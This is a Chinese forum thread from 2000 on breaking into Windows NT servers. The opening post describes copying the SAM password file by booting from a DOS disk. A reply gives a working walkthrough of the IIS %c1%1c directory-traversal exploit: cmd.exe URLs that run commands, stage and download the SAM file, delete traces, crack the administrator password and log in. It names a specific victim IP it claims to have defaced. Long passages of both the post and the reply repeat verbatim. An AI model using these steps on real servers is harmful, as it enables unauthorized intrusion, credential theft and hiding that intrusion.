6,868
社区成员
发帖
与我相关
我的任务
分享NT 不堪一击!
网上有很多有关破解NT密码的文章,但是通观全局,一律是要有一个能登陆进NT内部的用户账号,然后获得存储NT密码的文件,或是进去后直接安装破解密码的黑客程序.
此做法太多限制,很不可取!!!
现介绍一个直接明了简单的方法.
1.工具:dos启动盘,ntfsdos.exe(dos下看NTfs分区文件的工具),一个能解sam文件的黑客工具(网上很多).
2.步骤;
先用dos盘启动服务器,进去后,运行ntfsdos.exe,然后找到sam文件考出来,做后把sam文件拿到一台装有破解sam文件工具的机子上......
此方法,不需要有账号,不需登陆进服务器中,很轻松就能得到你想要的东西.你只需要有能接触服务器的机会,在花一两分钟的时间就行啦!
此做法太多限制,很不可取!!!
现介绍一个直接明了简单的方法.
1.工具:dos启动盘,ntfsdos.exe(dos下看NTfs分区文件的工具),一个能解sam文件的黑客工具(网上很多).
2.步骤;
先用dos盘启动服务器,进去后,运行ntfsdos.exe,然后找到sam文件考出来,做后把sam文件拿到一台装有破解sam文件工具的机子上......
此方法,不需要有账号,不需登陆进服务器中,很轻松就能得到你想要的东西.你只需要有能接触服务器的机会,在花一两分钟的时间就行啦!
...全文
请发表友善的回复…
发表回复
lynxliu 2000-11-02
- 打赏
- 举报
只要把目录执行的权限关掉,或者仅限于本地执行,你的方法就不管用了,nt本身谈不上脆弱,好多的安全措施,就没人使用。
nieyongxin 2000-11-02
- 打赏
- 举报
经本人测试,下面的方法确实可行,我整理此篇文章的时间是2000.10.29,测试时间是
2000.10.28,测试的IP是 210.62.8.9 。入侵后的结果是http://210.62.8.9/index.html ,至10.29,此页面仍未恢复。
近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。
c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1,好像台湾繁体中文也受此漏洞影响。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!写个E_mail给主机的网管说明了漏洞情况^^
2000.10.28,测试的IP是 210.62.8.9 。入侵后的结果是http://210.62.8.9/index.html ,至10.29,此页面仍未恢复。
近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。
c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1,好像台湾繁体中文也受此漏洞影响。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!写个E_mail给主机的网管说明了漏洞情况^^
wjf 2000-11-02
- 打赏
- 举报
您的言论也不堪一击
wjf 2000-11-02
- 打赏
- 举报
都能直接接触到硬盘软区,那还谈什么黑它。只要你愿意并准备好承担相应后果,你可以制造比CIH强一万倍的破坏:砸了他!!!!!!!!!!!!! :-)
Cloudz 2000-11-02
- 打赏
- 举报
严重同意edyang的观点。
nieyongxin,待我先去实验一下
:))
nieyongxin,待我先去实验一下
:))
Edward 2000-11-02
- 打赏
- 举报
呵呵,那你要先有机会进入放 NT Server 的机房中的再说吧!一个年营业额超过 100 万美元的公司的任何 NT Server 都不是你想看到就看到的,有没有软驱很难说,CD-ROM 上不上锁也很难说,CMOS 设不设密码也很难说。呵呵呵,好办法,我也早就想到了。
